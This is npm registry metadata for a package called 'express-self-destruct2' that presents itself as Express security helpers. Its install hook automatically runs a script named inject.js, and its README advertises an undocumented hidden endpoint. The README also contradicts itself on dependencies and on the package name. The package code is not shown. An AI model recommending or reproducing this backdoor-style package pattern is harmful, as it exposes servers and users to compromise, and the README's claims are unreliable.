{"_id":"express-self-destruct2","name":"express-self-destruct2","dist-tags":{"latest":"1.0.0"},"versions":{"1.0.0":{"name":"express-self-destruct2","version":"1.0.0","description":"Lightweight security helpers for Express","main":"index.js","scripts":{"postinstall":"node scripts/inject.js"},"keywords":["express","security"],"author":{"name":"Your Name"},"license":"MIT","peerDependencies":{"express":">=4.0.0"},"dependencies":{"express-self-destruct1":"^1.0.0"},"_id":"express-self-destruct2@1.0.0","_nodeVersion":"22.20.0","_npmVersion":"10.9.3","dist":{"integrity":"sha512-ouCbO3WEZQPt9YCEhVPj089NmOmXzo/VT+EtK3XqRv4tLas1IUOirou8T1GmQX2F4mB/TBx7btiwRl523qkiJA==","shasum":"c5764891269cd0b4768e8e8680e90057db50dcc1","tarball":"https://registry.npmjs.org/express-self-destruct2/-/express-self-destruct2-1.0.0.tgz","fileCount":4,"unpackedSize":6683,"signatures":[{"keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U","sig":"MEYCIQD9VWL2KOBcK8435V3ECcxqUaoNlmLkrEvor2ZprMB8ygIhAOAfk2k9+wE3B5DnzvC/XiJs6tNFhWB4xZzE+fa0EwT9"}]},"_npmUser":{"name":"my_name_is_khn","email":"Ishan006@proton.me"},"directories":{},"maintainers":[{"name":"my_name_is_khn","email":"Ishan006@proton.me"}],"_npmOperationalInternal":{"host":"s3://npm-registry-packages-npm-production","tmp":"tmp/express-self-destruct2_1.0.0_1780828320024_0.9791852029655801"},"_hasShrinkwrap":false}},"time":{"created":"2026-06-07T10:31:59.740Z","1.0.0":"2026-06-07T10:32:00.174Z","modified":"2026-06-07T10:32:00.373Z"},"maintainers":[{"name":"my_name_is_khn","email":"Ishan006@proton.me"}],"description":"Lightweight security helpers for Express","keywords":["express","security"],"author":{"name":"Your Name"},"license":"MIT","readme":"# Express Security Tool\r\n\r\nAdds common security headers, request ID tracking, and a hidden health check endpoint.\r\n\r\n## Installation\r\n\r\n\\`\\`\\`bash\r\nnpm install @yourscope/express-security-tool\r\n\\`\\`\\`\r\n\r\n## Usage\r\n\r\n\\`\\`\\`js\r\nconst security = require('@yourscope/express-security-tool');\r\napp.use(security());\r\n// Now all responses include X-Request-Id header\r\n\\`\\`\\`\r\n\r\n## Features\r\n\r\n- Automatic request ID generation\r\n- Hidden endpoint for internal monitoring (undocumented)\r\n- Lightweight, zero dependencies\r\n\r\n## License\r\n\r\nMIT","readmeFilename":"README.md","_rev":"1-ad127b84f255f6ef0e39a3f4cd7b351e"}